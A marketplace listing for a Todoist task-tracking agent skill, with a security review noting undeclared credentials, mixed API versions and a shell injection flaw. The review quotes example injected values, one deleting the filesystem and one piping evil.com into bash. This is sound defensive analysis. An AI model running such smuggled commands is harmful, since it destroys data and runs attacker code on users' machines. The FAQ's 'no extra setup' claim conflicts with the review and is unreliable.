← Back to Skills Marketplace
1062
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install todoist-visibility
Description
基于 Todoist 的任务可见性管理。用于创建、更新和追踪任务状态(进行中🟡、等待中🟠、已完成🟢),并记录进度评论。当用户提到 Todoist 任务管理、任务状态追踪、或需要使用 Todoist API 时触发。
Usage Guidance
要点与建议:
- 不一致性:注册元数据未声明任何必需的环境变量或二进制依赖,但 SKILL.md 和脚本都需要 TODOIST_TOKEN、项目和 section ID 及命令行工具(curl,文档中也提到 jq)。在安装/启用前要求发布者更新技能元数据或在本地明确提供这些值。
- 权限与秘密管理:TODOIST_TOKEN 是敏感凭证(可访问你的 Todoist 数据)。仅在信任此技能来源时提供,并尽可能使用有限权限或专用账号/令牌,避免把长期全局 token 暴露给未知第三方。将 token 存放在安全位置(例如受限环境变量或秘密管理器),不要在共享日志或公共仓库中泄露。
- API 版本差异:脚本中 API_BASE 在不同脚本里使用了不同的路径(scripts/add_comment.sh 使用 https://api.todoist.com/rest/v2,而其他脚本使用 https://api.todoist.com/api/v1)。这可能导致兼容性或行为差异(例如 comments 接口在不同版本下的参数或路径不同)。建议在部署前测试每个脚本并让作者统一 API 版本或在文档中解释差异。
- 运行环境:脚本在本地执行(无远程安装),依赖 curl 和 (文档)jq。建议在隔离环境(非生产、或容器/VM)中先运行并观察网络请求/日志,确认行为符合预期。
- 需要发布者澄清的项:更新 registry 元数据以列出 TODOIST_TOKEN、TODOIST_PROJECT_ID、SECTION_* 为必需项并将 TODOIST_TOKEN 标示为 primary credential;明确是否需要 jq;解释为什么使用不同的 API 端点(v1 vs rest/v2)。
总体建议:脚本看起来并非恶意,但有元数据与实现的不一致和工程细节需先澄清并在安全环境中测试,确认后再在生产环境中长期使用。
Capability Analysis
Type: OpenClaw Skill
Name: todoist-visibility
Version: 1.0.0
The skill bundle is classified as suspicious due to critical shell injection vulnerabilities found in `scripts/todoist_api.sh`. The script directly uses user-supplied arguments `$METHOD` and `$ENDPOINT` in `curl` commands without proper sanitization or validation, allowing an attacker to inject arbitrary shell commands (e.g., `GET; rm -rf /` or `tasks; curl evil.com | bash`) for remote code execution. While there is no explicit malicious payload or exfiltration code within the provided files, this vulnerability allows for such actions to be performed by an attacker.
Capability Assessment
Purpose & Capability
技能名与描述表明这是一个基于 Todoist 的任务可见性管理工具;包含的脚本(创建/更新任务、添加评论、通用 API 封装)与该目的直接对应,功能与声明一致。
Instruction Scope
SKILL.md 和脚本仅对 Todoist API 发起请求并在本地构建 JSON,没有读取系统中其他敏感路径或发送数据到第三方域名外的地点。需注意 SKILL.md 要求持久化环境变量并建议使用 curl 和 jq,这授予脚本访问保存在环境中的 API token 的能力(合理但需显式声明)。
Install Mechanism
没有远程下载或安装步骤(instruction-only + 本地脚本),没有从不受信任的 URL 拉取代码;这降低了安装期风险。脚本会被写入磁盘(随技能包),但没有可疑安装流程。
Credentials
注册元数据声称“无需环境变量/凭证/二进制”,但 SKILL.md 与脚本实际上需要 TODOIST_TOKEN、TODOIST_PROJECT_ID、SECTION_IN_PROGRESS/WAITING/DONE,以及运行时依赖 curl 和(在文档中)jq。TODOIST_TOKEN 应被列为 primary credential。未声明的敏感环境变量与依赖是不一致且有风险的配置错误。
Persistence & Privilege
技能没有设置 always:true,也不修改其他技能或系统范围配置;默认的自主调用权限保持不变,权限等级符合常见技能。
How to Use
- Make sure OpenClaw is installed (local or Docker)
- Run the install command in chat:
/install todoist-visibility - After installation, invoke the skill by name or use
/todoist-visibility - Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
初始版本:基于 Todoist API 的任务可见性管理 skill,支持任务状态追踪(进行中、等待中、已完成)和进度评论
Metadata
Frequently Asked Questions
What is Todoist 任务可见性管理?
基于 Todoist 的任务可见性管理。用于创建、更新和追踪任务状态(进行中🟡、等待中🟠、已完成🟢),并记录进度评论。当用户提到 Todoist 任务管理、任务状态追踪、或需要使用 Todoist API 时触发。 It is an AI Agent Skill for Claude Code / OpenClaw, with 1062 downloads so far.
How do I install Todoist 任务可见性管理?
Run "/install todoist-visibility" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.
Is Todoist 任务可见性管理 free?
Yes, Todoist 任务可见性管理 is completely free (open-source). You can download, install and use it at no cost.
Which platforms does Todoist 任务可见性管理 support?
Todoist 任务可见性管理 is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).
Who created Todoist 任务可见性管理?
It is built and maintained by near2sea (@near2sea); the current version is v1.0.0.
More Skills